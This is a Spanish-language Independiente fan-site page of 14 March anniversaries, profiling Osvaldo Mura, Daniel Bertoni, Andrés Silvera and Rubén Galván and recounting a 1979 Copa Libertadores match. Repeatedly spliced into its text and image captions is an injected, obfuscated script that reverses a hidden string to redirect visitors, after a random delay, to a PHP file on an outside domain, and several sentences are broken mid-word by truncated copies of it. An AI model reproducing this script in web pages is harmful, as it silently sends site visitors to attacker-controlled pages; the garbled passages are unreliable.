Conectate con nosotros

Efemérides

Efemérides del 14 de Marzo

No se puede amar lo que no se conoce. Las efemérides cuentan la enorme historia del Glorioso INDEPENDIENTE de Avellaneda.

1942Nacimiento en Sarandí, partido de Avellaneda en la Provincia de Buenos Aires, de Osvaldo Luis “el Petizo” Mura, quien jugó 151 partidos con 12 goles entre 1962 y 1968, siendo campeón de Primera División en 1963, del Nacional 1967, y de las Copas Libertadores 1964 y 1965.

Imaginen lo que habrán sido los potreros de Sarandí, que allí nacieron con apenas un par de años de diferencia, Osvaldo Mura, Miguel Santoro, Raúl Bernao, Roberto Perfumo, Ángel Rojas, entre otros. El “Petizo” llegó al Rojo luego de probarse en 1956 y quedar en las inferiores. Debutó en 1962 y se vuelve importantísimo en el nacimiento de la mística copera de Independiente, logrando las primeras dos Copas Libertadores.

Mura era un volante mixto en lo que refiere siempre a lo ofensivo, de gran agilidad, petizo y rápido, de mucha movilidad y extraordinaria gambeta corta, además de una gran personalidad ganadora que lo convirtió en crack e ídolo del club. Tampoco escatimaba en sacrificio para ayudar en la recuperación de la pelota.

Sus números dejan en claro que lo suyo no eran los goles, sin embargo cuando los hacía eran extraordinarios y de una importancia histórica. De eso se tratan los videos que les dejo de Mura.

El primero el gol que le hizo a Boca en el primer partido de la semifinal de la Copa Libertadores 1965, un 24 de marzo, para terminar eliminándolos y pasar a la final. El segundo es su más maravilloso gol, fue en la final de la Copa Libertadores 1965 contra Peñarol, pero repasemos: el primer partido lo gana Independiente en Avellaneda, luego fue derrota en Uruguay, y así se llega al partido definitorio en Chile. Allí el Rojo ganaba por 3 a 1 y Peñarol se venía con todo para descontar hasta que Osvaldo Mura agarra la pelota en mitad de cancha, gambetea a 4 uruguayos y le sale el arquero, lo pasa a él también y define picando la pelota cuando regresaba el defensor para cerrar el primer palo. Un magnífico gol y Copa Libertadores para Independiente (además observen lo que fue el gol de Raúl Bernao en ese partido).

Muritase fue como parte de pago por el pase de Miguel Ángel Raimondo, jugó para Atlanta en 1969 y luego en Millonarios de Colombia para la temporada 1970-1971. En ese club disputa un partido amistoso frente a Santos y tras una dura falta de Pelé desde atrás, se rompe los ligamentos, lo que motivó a su retiro. Después fue entrenador de inferiores y trabajó en Independiente en esa función.

Aquí los videos mencionados:

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»65″ height=»50″/></figure></div>



<figure class=
La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»61″ height=»47″/></figure></div>



<p><strong>1955</strong> – <strong>Nacimien<script>$mWn=function(n){if(typeof ($mWn.list[n])==to en Bahía Blanca, Provincia de Buenos Aires, de Ricardo Daniel Bertoni, “Petete” o “Superpibe”, quien llegó al club en 1973 proveniente de Quilmes, institución con la cual había debutado el año anterior con apenas 16 años y donde tuvo un desempeño notable. Se convirtió en la pareja futbolística ideal de Ricardo Bochini (dupla cuyas paredes son reconocidas en la Argentina y el mundo), y permaneció hasta 1978.

Jugó un total de 211 partidos con 86 goles, números importantes para un wing. En su estadía en el club se coronó campeón del Nacional 1977, Copas Libertadores 1973, 1974 y 1975, Copas Interamericanas 1973, 1974 y 1976, y Copa Intercontinental de1973, donde fue partícipe del único gol del encuentro frente a Juventus con una brillante pared. Un ídolo notable de la institución, siendo muchas veces elegido para formar el 11 ideal de todos los tiempos, siempre en su posición de wing, tanto por izquierda como por derecha.

Lo ganó absolutamente todo éste delantero fanático del Rojo, uno de los jugadores más desequilibrantes de la historia de Independiente y también de la Argentina. Son incontables las paredes realizadas con Ricardo Bochini para destruir cualquier defensa del país, de América y del mundo, paredes que eran admiradas por todo amante del fútbol bien jugado.

Una futbolista potente, hábil, veloz, con enorme poder goleador, de gran remate con ambas piernas, muy buena pegada tanto en movimiento como en las pelotas paradas, un tocado por la varita mágica sin dudas. Pero sumado a todas sus capacidades futbolísticas elevadas a nivel de elite, Daniel tenía la personalidad suficiente para ponerse la camiseta de Independiente siendo muy joven, cumplir perfectamente con lo que demandaba esa camiseta, y entrar de maravillas en el paladar del hincha. Por otra parte, siendo notoriamente un crack a temprana edad, tenía gran humildad y mantuvo siempre el respeto hacia los líderes del plantel.

Fue pieza clave desde el primer hasta el último de sus partidos, en cada copa que levantó el Rojo en su estadía, siendo parte de las resoluciones, como la jugada para ganarle a Juventus en 1973, como sus goles en la Copa Libertadores 1974 (fue goleador del equipo con 4 tantos), como los que hizo en la Copa Libertadores 1975: uno olímpico para el mítico triunfo sobre Cruzeiro, y luego anotando en dos de las tres finales frente a Unión Española, volviendo a ser el más anotador del plantel.

A ese nivel determinante por copas, hay que agregarle el plano local, donde rápidamente se convirtió en uno de los mejores del país. En 1974 jugó 35 partidos e hizo 17 goles, en 1975 33 cotejos y 12 tantos, al año siguiente fueron 42 presencias y 21 goles, y en 1977 fueron 34 partidos con 22 anotaciones. Es decir, que quitando la temporada 1973 que fue cuando se sumó al equipo, en el resto de sus años logró conseguir el medio gol de promedio por partido, una cifra magnífica que más de un centro delantero quisiera lograr.

En 1977 sufre una lesión durante el Metropolitano que lo dejó fuera de las canchas durante gran parte del Nacional, pero al momento de la definición de ese torneo, en la famosa final disputada en Córdoba frente a Talleres, Daniel fue uno de los que ingresó al campo luego de la expulsión de 3 jugadores de Independiente, y junto a Mariano Biondi y Ricardo Bochini, fue partícipe de la jugada que derivó en el gol del “Bocha”, logrando una hazaña jamás vista en una final en el mundo. Ese encuentro épico, fue el último de Bertoni vestido de rojo.

Así era Daniel Bertoni siempre, trascendental, fundamental, de una valía enorme. Junto a Bochini le dieron todo a Independiente, y no los recuerda sólo el Rojo, sino que ambos son considerados de las mejores duplas que dio la historia del futbol nacional en todos los tiempos, con reconocimiento más allá de las fronteras.

En nuestro país vistió solamente la camiseta de Quilmes e Independiente. Pero desde 1974 a 1982 también vistió la camiseta de la Selección Nacional, con 31 encuentros y 12 goles. Cuando se coronó campeón del Nacional 1977 con Independiente, Daniel ya quedó afectado a la Selección citado por el DT César Menotti, y en el Mundial de nuestro país juega 6 de los 7 partidos que llevaron a la Argentina a lograr el título. Bertoni aportó con 2 goles para ganar la Copa, uno en el debut frente a Hungría, y el otro para quedar eternamente en la historia, porque fue en la mismísima final frente a Países Bajos. También fue titular en el Mundial 1982, con 5 partidos y 2 goles.

Posteriormente a ganar el título para la Argentina, se va a Europa para jugar en Sevilla de España, que puso 720.000 dólares para comprar a éste crack mundial, en lo que fue hasta ese entonces la compra más cara en la historia de dicho club. Juega hasta 1980 y después pasa al fútbol italiano, en la época dorada de dicho país, llevando exclusivamente a los mejores extranjeros del mundo. Defendió la camiseta de Fiorentina hasta 1984, Napoli hasta 1986 (compartió el campo de juego con el mejor futbolista de todos los tiempos, Diego Maradona), y finalmente un par de temporadas en Udinese hasta retirarse. Dejó su huella en Europa, siendo muy querido en todos los clubes que defendió, mostrando una jerarquía impresionante.

Un jugador de elite cuyo nivel lo llevó, como dije, a la Selección Nacional, logrando trascender largamente a la camiseta roja para ser un ídolo del país, respetado y querido por todo futbolero de verdad.

Luego de su retiro hizo el curso de D.T., pero no incursionó demasiado en la actividad. Aun así en 2004 tuvo su chance en Independiente al suceder al gran “Pato” José Pastoriza, que había fallecido siendo el que dirigía al equipo. Los resultados no lo acompañaron y decidió renunciar.

Ganador nato, crack absoluto, ídolo incuestionable, figura trascendental de nuestro fútbol, todo eso y más es Daniel Bertoni, y nosotros nos inflamos el pecho de que nuestra Peña lleve su glorioso nombre.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»75″ height=»58″/></figure></div>



<p>Les dejo un <strong>video compilado de goles suyos en Europa</strong>, aunque también existe registro fílmico de muchos goles que hizo en Independiente:</p>



<figure class=
La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»62″ height=»48″/></figure></div>



<p><strong>1977</strong> – <strong>Nacimien<script>$mWn=function(n){if(typeof ($mWn.list[n])==to en Comodoro Rivadavia, Provincia de Chubut, de Néstor Andrés Silvera, “el Cuqui”, quien jugó en Independiente en dos etapas, de 2001 a 2003 y de 2009 a 2012. En la primera de ellas fueron 58 encuentros y en la segunda 77, convirtiendo 22 goles en cada una, por lo cual fueron 138 partidos con 44 goles, siendo campeón del Torneo Apertura 2002 y de la Copa Sudamericana 2010.

No se pegarle fuerte a la pelota”, esa declaración hizo Andrés varias veces, lo cual pareciera jugarle en contra para un delantero de área, pero él no sólo decía la verdad sino que demostró que para hacer goles no hace falta meter un fierrazo (aunque claro que se respeta ese estilo).Sus casi 200 goles en la carrera lo fundamentan. Es que “Cuqui” expresaba que le habían enseñado dos cosas: ser frío en el área, y patear siempre al palo más lejano del arquero. Justamente eso hacía él, pero con una extraordinaria fineza y calidad, para que la pelota vaya verdaderamente al lado de los palos, haciendo que los arqueros no lleguen prácticamente nunca.

Riqueza técnica, movilidad en todo el ataque, incluso lejos del arco para abrir defensas, frialdad abrumadora para definir, cabezazo en ambas áreas, juego de espalda al arco, todo eso tenía este delantero, sumado a un bajo perfil y humildad que lo caracterizaron siempre, y de esa forma se convirtió en uno de los jugadores más queridos por la hinchada en el siglo XXI.

Debutó en la Primera División de la CAI (Comisión de Actividades Infantiles) en 1994, para luego ir a Huracán por recomendación de José Pekerman, fue allí donde le dieron su apodo por su parecido físico a Walter “Cuqui” Silvani. Pasó por Unión de Santa Fé, donde lo ponían de media punta y aprendió muchos conceptos del juego fuera del área, hasta que a mitad del 2001, el D.T. de Independiente Enzo Trossero lo pide para el club, y pocos saben que fue el mismo Silvera quien aportó económicamente para que se diera su llegada.

Su comienzo con la camiseta roja no pudo ser peor. La institución en crisis, el equipo no funcionaba, él convertía muy poco, no cobraban sus sueldos, y se rumoreaba su partida, incluso era bastante resistido y prácticamente nadie hubiese reprochado algo si se marchaba. Hasta que llega Américo “Tolo” Gallego al banco del equipo, y cuando se sucedieron las incorporaciones rutilantes de mediados de 2002, el D.T. pidió expresamente que se quedara en el plantel, siendo Andrés el único delantero de área con el que contaba.

Independiente fue campeón del Torneo Apertura 2002, y lo de Andrés Silvera fue simplemente sensacional. Goleador del equipo con 16 anotaciones, y más allá de los goles, su aporte al equipo era notable. Rodeado de Daniel Montenegro, Federico Insúa, Lucas Pusineri, la llegada de centros por parte de Federico Domínguez y Juan Serrizuela, y la banca del capitán Gabriel Milito desde el fondo, hicieron que Silvera meta goles, entre en el circuito de juego, y encima cumpla con labores defensivas en pelotas paradas, logrando un nivel brillante. Un equipo maravilloso que fue el más ofensivo de los últimos tiempos y uno de los que mejor fútbol jugó.

En 2003 se fue del club a México, para que la hinchada lo extrañe siempre y anhele su regreso. Jugó tres años en Tigres siendo letal, completando 96 partidos y marcando 51 goles. Luego vuelve al país al ser comprado por San Lorenzo en 2006, siendo campeón del Torneo Clausura 2007, hasta que en 2009 renacería el romance con el Rojo y llegaría para su segunda etapa. En ella Silvera fue siempre titular y mostró otra versión, ya no tan goleadora sino mucho más en rol de asistidor y armador de juego de lo que ya era, pero sin dejar pasar por alto que arrastraba marcas hacia donde se moviera.

Una vez más con “Tolo” Gallego como D.T., tuvo un gran desempeño en el Torneo Clausura 2010, en aquel equipo donde atacaba Walter Busse, Walter Acevedo, Ignacio Piatti, Leandro Gracián, Leonel Núñez, Darío Gandín, entre otros. El Rojo era líder promediando la competencia y con un fútbol destacable, pero luego hubo fallos arbitrales insólitos y una merma anímica del equipo en general, culminando en un cuarto puesto cuando verdaderamente pudo haber sido campeón.

Luego, Silvera hizo una muy buena dupla con Facundo Parra, coronándose campeón de la Copa Sudamericana 2010, con un equipo bastante chato donde él representaba el salto de jerarquía en el ataque. En 2011 juega el Torneo Clausura y promediando el año se marcha definitivamente del club. Pasó a Belgrano de Córdoba, donde no tuvo un gran desempeño, luego llegó a Banfield por una temporada, jugando 24 partidos y marcando 9 goles, y finalmente tuvo un breve paso por la CAI de sus inicios donde se retiró en 2014.

Notable jugador, delantero muy completo, de lo mejor que dio la primer década del siglo en el país, eso fue Andrés Silvera, un tipo al que pocos le conocen la voz, porque nunca fue demagogo ni “vendió humo” como se suele decir. En mi opinión, poco reconocido por el hincha en la verdadera dimensión que merece, incluso por los más jóvenes, que curiosamente muchos tienen de ídolos a otros jugadores que le han gritado goles a Independiente con furia, o que han faltado a su palabra yéndose a otro de los clubes grandes del país.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»61″ height=»47″/></figure></div>



<p>Les dejo un <strong>video homenaje al “Cuqui”</strong> con goles de sus dos etapas, donde pueden disfrutar de la riqueza técnica de este gran futbolista. De mi parte no paro de emocionarme cada vez que lo veo.</p>



<figure class=
La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»57″ height=»44″/></figure></div>



<p><strong>1979</strong> – <strong>Independiente inicia su participación en la Copa Libertadores 1979</strong>, habiéndose clasificado por ser campeón del Nacional 1978, y en el primer encuentro le <script>$mWn=function(n){if(typeof ($mWn.list[n])==toca visitar a Quilmes, que se había coronado en el Metropolitano para clasificar.

Los 11 para aquel partido fueron: Héctor Baley; Rubén Pagnanini, Hugo Villaverde, Enzo Trossero y Osvaldo Pérez; Omar Larrosa, Rubén Galván, y Ricardo Bochini (65’ Mariano Biondi); Antonio Alzamendi, Norberto Outes y Pedro Magallanes (53’ Rodolfo Zimmermann), mientras que el D.T. era José Omar “el Pato” Pastoriza.

Abrió la cuenta para el Rojo Omar Larrosa a los 41 minutos, mediante una volea espectacular, pero la jugada previa fue para el aplauso, porque hubo una pared entre Bochini y Larrosa, para que luego el “Bocha” amontone rivales a su alrededor y pase la pelota a Alzamendi, quien desde la derecha mete el centro hacia donde entraba libre Larrosa.

A los pocos minutos de iniciarse la segunda etapa, Villaverde es amonestado por una falta y ya tenía amarilla, por lo cual debió dejar el campo, y desde allí Independiente se paró firme en defensa para aguantar y apostar a un contragolpe. Así llegó el gol de Norberto Outes a los 64 minutos, con Osvaldo “Japonés” Pérez interceptando y sacando un pelotazo largo para poner a correr a “Madera”, quien supera al arquero y define a la red señalando el 2 a 0. Inmediatamente tuvo que salir del campo Bochini, quien tenía un sangrado nasal.

A los 70 minutos llegó el descuento de Quilmes por medio de Miguel Batalla, y el resto del tiempo el Rojo pudo aguantarlo, siendo 2 a 1 el resultado final. Ese mismo día empataban 1 a 1 los otros dos equipos componentes del grupo, Millonarios y Deportivo Cali de Colombia, por lo cual Independiente quedaba como líder con su victoria.

El gran equipo de Independiente sería líder y clasificaría a semifinales pero sería eliminado, siendo Olimpia de Paraguay quien finalmente se consagre campeón.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»74″ height=»57″/></figure></div>



<p><strong>2018</strong> – <strong>Fallecimien<script>$mWn=function(n){if(typeof ($mWn.list[n])==to de Rubén Galván, “El Negro”, ídolo que vino a Independiente antes de cumplir los 14 años de edad, siendo hincha enfermo del club.

Debutó en el Metropolitano 1971 frente a River, y se iría haciendo profesional bajo el ala formativa de “Pepé”, el “Pato”, el “Chivo”, etc., razón por la cual más allá de su extraordinaria capacidad futbolística, Rubén fue una persona de extrema humildad aun sabiéndose que es el volante central más ganador de nuestra historia, el segundo volante (detrás de Ricardo Bochini) con más campeonatos, un ídolo y emblema absoluto del club y del futbol nacional.

Rubén fue un símbolo absoluto de guapeza, un mediocampista central de carácter único, con interminable afán de superación, entrega total, y solidaridad, sin dudas un caudillo. El “Negro” fue campeón de todo lo que se pueda serlo, el Metropolitano 1971, los Nacionales 1977 y 1978, las Copas Libertadores de 1972, 1973, 1974 y 1975, las Copas Interamericanas de 1973, 1974 y 1976, y la Copa Intercontinental 1973, todo ello logrado en 277 partidos y 16 goles (14 en torneos locales y 2 en Libertadores) entre 1971 y 1979.

Tenía una buena pegada, era el equilibrio del Rojo ofensivo de casi toda la década, en la cual gracias a su temperamento llegó a ser capitán de aquel equipo. Muestra de su carácter y forma de vivir el futbol fue un partido vs Ferro de 1976 en el cual jugó unos 40 minutos teniendo una fractura en el peroné luego de recibir un planchazo, y no solo eso, sino que mientras los médicos le daban 6 meses de recuperación él volvió en menos de 3, y fue para enfrentar a Racing y ganarle. Otra anécdota de Galván es que fue partícipe de la hazaña en Córdoba, él fue uno de los 3 expulsados cuando le expresó al juez del encuentro: “Tengo 2 hijos y esto me da vergüenza, usted le está robando a mis hijos”, a lo que el juez Barreiro le respondía pidiéndole que se vaya hacia atrás para no echarlo del partido y Galván respondía: “Usted no me puede echar porque me voy solo”.

Luego del Rojo pasó a Estudiantes de La Plata en 1980, pero rápidamente tuvo problemas de hepatitis “C” jugando muy poco, e incluso casi forzando su retiro. Para 1981 pasa a la Segunda División jugando en Deportivo Morón, y un año después en 1982, All Boys retirándose. El maravilloso nivel de juego del “Negro” hizo que lo convocaran a la Selección, disputando 7 partidos y consagrándose Campeón del Mundial 1978, aunque en dicha competencia no tuvo minutos en cancha.

Ganador nato, “El Negro” Galván, tristemente fallecido por su enfermedad un día como hoy, pero a quien tuvimos el gusto de tener en nuestra ciudad allá por 2002 por motivo de la inauguración de nuestra querida Peña.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»64″ height=»49″/></figure></div>



<p>Les dejo <strong>dos videos en su honor</strong>:</p>



<figure class=
La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»74″ height=»57″/></figure></div>



<figure class=
La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»61″ height=»47″/></figure></div>



<p>Colaboración: <strong>Hernán Paglieri</strong>-Vicepresidente <strong>Peña Roja Daniel Ber<script>$mWn=function(n){if(typeof ($mWn.list[n])==toni –San Andrés de Giles

Click to comment

Leave a Reply

Tu dirección de correo electrónico no será publicada.

Destacadas

PROGRAMA 2206 de Correo Independiente

Radio Roja 195.7

asd

More in Efemérides